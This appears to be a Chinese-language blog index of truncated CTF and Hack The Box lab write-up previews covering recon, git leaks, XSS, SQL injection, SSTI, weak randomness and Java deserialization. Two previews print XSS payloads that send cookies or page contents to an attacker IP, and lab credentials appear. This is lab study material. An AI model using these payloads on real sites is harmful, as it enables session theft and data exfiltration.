Yiyi

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch>python dirsearch.py -u http://cypher.htb/ _|. _ _ _ _ _ _|_ v0.4.3 by 鹏组安全 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11714Output File: E:\小工具\ONE-FOX集成工具箱_V8公开版_by狐狸\gui_scan\dirsearch\repor ...

fscan只扫出22 80 110端口 学到一个新的信息搜集的新招 snmpwalk 命令从目标主机 underpass.htb 获取的管理信息库 (MIB) 数据 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950┌──(root㉿kali)-[~]└─# snmpwalk -v1 -c public underpass.htbCreated directory: /var/lib/snmp/cert_indexesiso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10iso.3.6.1.2.1.1.3.0 = Timeticks: (11947193) ...

As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Username: Olivia Password: ichliebedich 1234567891011121314151617181920212223242526272829303132333435363738┌──────────────────────────────────────────────┐│ ___ _ ││ / _ \ ___ ___ _ __ __ _ ___| | __ ││ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / ││ / /_\\_____\__ \ (__| | | (_| | (__| < ││ \____/ |___ ...

fscan扫描没什么内容 目录扫描扫到 1http://linkvortex.htb/robots.txt 123456User-agent: *Sitemap: http://linkvortex.htb/sitemap.xmlDisallow: /ghost/Disallow: /p/Disallow: /email/Disallow: /r/ 一个登录框，但是暂时利用不起来 fuzz出一个[Launching Soon](http://dev.linkvortex.htb/) git泄露 githack和githacker拉下来不大一样 可以获取到一些敏感信息泄露 12const email = 'test@example.com';const password = 'OctopiFociPilfer45'; 学到了一个新姿势 可以关注/.git/logs/HEAD是对应的上传者的相关信息 10000000000000000000000000000000000000000 299cdb4387763 ...

fscan dirsearch扫到git泄露 githacker拉下来 注册账号后发现这里可能有漏洞点 审计代码 这里对出了照片的其他选项做了过滤，因此可以从照片入手 貌似是对MIME头做了检验 下面还有一个白名单 那好像不大好注了 看看别的 在view_cat看到打印了这么多内容 其中这几个在前面看到是被waf过滤过的 那么就可以从用户名入手 1<img src=1 onerror=this.src="http://10.10.16.35:4444/?yiyi="+encodeURIComponent(document.cookie)> 注册登录后注册一只猫 得到审核人员的cookie 替换cookie进入管理员面板 继续审计accept_cat部分的代码，发现没有太多防护措施 且通过config可以看出是sqlite 尝试sqlmap注入一下 12python sqlmap.py -r C:\Users\31702\Desktop\tmp\req.txt --dbms=SQLite --tables --batch --l ...

dirsearch 打开网站 是一个文件上传 只能传markdown文件 尝试xss 尝试访问/messages.php文件并将响应结果传输回攻击机 12345<script>fetch("http://alert.htb/messages.php").then(response => response.text()).then(data => {fetch("http://10.172.29.1:4444/?file_content=" + encodeURIComponent(data));});</script> 通过sharemarkdown获得路径 1http://alert.htb/visualizer.php?link_share=67da848835c9b5.19283533.md 发送给网站管理员 bot点击后弹回内容 url解密得到 1<h1>Messages</h1><ul><li>< ...

TPCTF-XCTF rk6 没爆0 输出了一点 supersqli看到这类的waf有点走不动道 第一反应是绕过waf，这里尝试了两种思路 一开始想到是http走私，但是没走成，前后都处理了TE头 https://www.geekby.site/2022/03/waf-bypass/#multipart-%E6%B7%B7%E6%B7%86 想着可以通过这种方式，waf那里把password当成文件，而后端又把password覆盖了 对着这篇文章改了一下,UNION SELECT递归拼接sql语句自身，replace绕过字符限制 123456789101112131415161718192021222324POST /flag/ HTTP/1.1Host: 1.95.159.113Content-Length: 523Cache-Control: max-age=0Origin: http://1.95.159.113Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x6 ...

123ctfshow会对你post提交的ctfshow参数进行base64解码然后进行反序列化构造出对当前题目地址的dns查询即可获得flag 链子 HashMap->readObject() HashMap->hash() URL->hashCode() URLStreamHandler->hashCode() URLStreamHandler->getHostAddress() InetAddress->getByName() 入口类选择12345实现Serializable接口；重写readObject方法，调用一个常见的函数；接收参数类型宽泛；最好JDK自带； 本链入口类为**java.util.HashMap** 首先hashmap实现了Serializable接口 因为**HashMap<K,V>存储数据采用的哈希表结构，元素的存取顺序不能保证一致。由于要保证键的唯一、不重复，在反序列化过程中就需要对Key进行hash，这样一来就需要重写readObject**方法。 调用了**hash函数，根据key产生hash。 ...

WEBez_emlog 猴子大王在1月23日开始学习Web安全并搭建了一个博客，你能找到他博客的漏洞吗。 一条人一只烟 一道web干一天 也是给我挖上0day了 拉源码做审计 跟一下，使用mt_rand生成随机数 由于这两个都调用了getRandStr函数，分别查看调用 account.php的logout接口设置了cookie，可以访问看一下 果然返回了，那么就可以逆序getRandStr进行解密后补零进行seed爆破 mt_rand()函数的特性-MT19937 MT19937有624个内部状态 每个状态是32位整数 需要624个连续的输出才能完全确定内部状态 我们需要补32组0 0 0 0提供足够的状态信息 12345678910111213<?php$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';$chars_length = strlen($chars) - 1;$p = 'RbAWvNJZ5YMeZLGMr56lfj ...

签到 webRank-l 【Flag完整格式一般为：DASCTF{******}，只需要提交{}内的内容。若Flag为其它格式，则会在题目描述中单独说明。】 49测试得到HTML_Entity编码的回显，ssti特征 测试得到子类 1234567891011121314151617181920212223{{''.__class__.__bases__[0]}}<class 'object'>{{''.__class__.__bases__[0].__subclasses__}}<built-in method __subclasses__ of type object at 0x7ff042cb17e0>{{''.__class__.__bases__[0].__subclasses__()}}[<class 'type'>, ...